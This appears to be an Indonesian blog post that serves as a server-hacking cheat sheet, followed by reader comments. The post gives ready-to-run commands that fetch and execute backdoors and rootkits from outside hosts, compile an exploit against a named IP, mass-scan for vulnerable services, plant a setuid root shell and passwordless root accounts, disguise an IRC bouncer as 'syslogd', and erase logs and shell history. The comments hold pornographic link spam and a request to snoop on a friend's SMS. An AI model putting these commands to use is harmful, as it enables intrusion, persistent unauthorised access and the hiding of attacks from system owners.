=================================================================================================
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
=================================================================================================
wget http://brutalside.host.sk/tools/ftp.tgz
gunzip ftp.tgz
gzip ftp.tar
tar -zxvf ftp.tar.gz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
=================================================================================================
scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik "-bash" ./psybnc
=================================================================================================
=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh...?
yg terjadi adalah uid dan gid kita adalah 0 :)
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc "syslogd "
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
mv psybnc.conf " " ; pwd
PATH=$PATH:/var/tmp/" "/.log/
"syslogd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================
+Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan
- ./apache IPTarget (Mis: ./apache 202.11159.67.176)
==================================
+Command MassApache
- ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan
- ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176)
================================================
+FTP Command 4 RooT
- ./scan No Depan IP Target (Mis: ./scannn 210 21 10)
=addUser=
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter,
buat password ketik passwd kuntua enter ,
abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita
Changing password for user ganjen
passwd: all authentication tokens updated successfully
berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..
kalo mau dapet acces root ketik :
/usr/sbin/useradd bash -u 0 -d /
abis itu ketik lagi
passwd -d bash
apus jejak
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
udah di ketik semua ? udahh... tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
2 komentar:
Hi hay pampere
http://porn-gratis-black.110mb.com/classic-porn =====> classic porn
http://porn-gratis-black.110mb.com/classic-porn-star =====> classic porn star
http://porn-gratis-black.110mb.com/disney-porn =====> disney porn
http://porn-gratis-black.110mb.com/ducky-porn =====> ducky porn
http://porn-gratis-black.110mb.com/dvd-porn-rental =====> dvd porn rental
http://porn-gratis-black.110mb.com/ebony-porn =====> ebony porn
http://porn-gratis-black.110mb.com/famous-porn-star =====> famous porn star
http://porn-gratis-black.110mb.com/fat-porn =====> fat porn
http://porn-gratis-black.110mb.com/filme-porn =====> filme porn
http://porn-gratis-black.110mb.com/free-amateur-porn =====> free amateur porn
http://porn-gratis-black.110mb.com/free-asian-porn =====> free asian porn
http://porn-gratis-black.110mb.com/free-celebrity-porn =====> free celebrity porn
http://porn-gratis-black.110mb.com/free-full-length-movie-porn =====> free full length movie porn
http://porn-gratis-black.110mb.com/free-full-length-porn =====> free full length porn
http://porn-gratis-black.110mb.com/free-full-length-porn-movie =====> free full length porn movie
http://porn-gratis-black.110mb.com/free-hardcore-porn =====> free hardcore porn
http://porn-gratis-black.110mb.com =====> homemade porn
http://porn-gratis-black.110mb.com =====> free homemade porn
http://sexxy.freehostia.com
http://video-mp3-disney.freehostia.com
http://disney.110mb.com
http://jonn22.110mb.com/
pok
mas, gmn cara liat sms temen dari server telkomsel? n panggilan keluar n masuk jg kalo bisa?? bagi ilmunya dong!!! biar
email y mas, pleeze...
Posting Komentar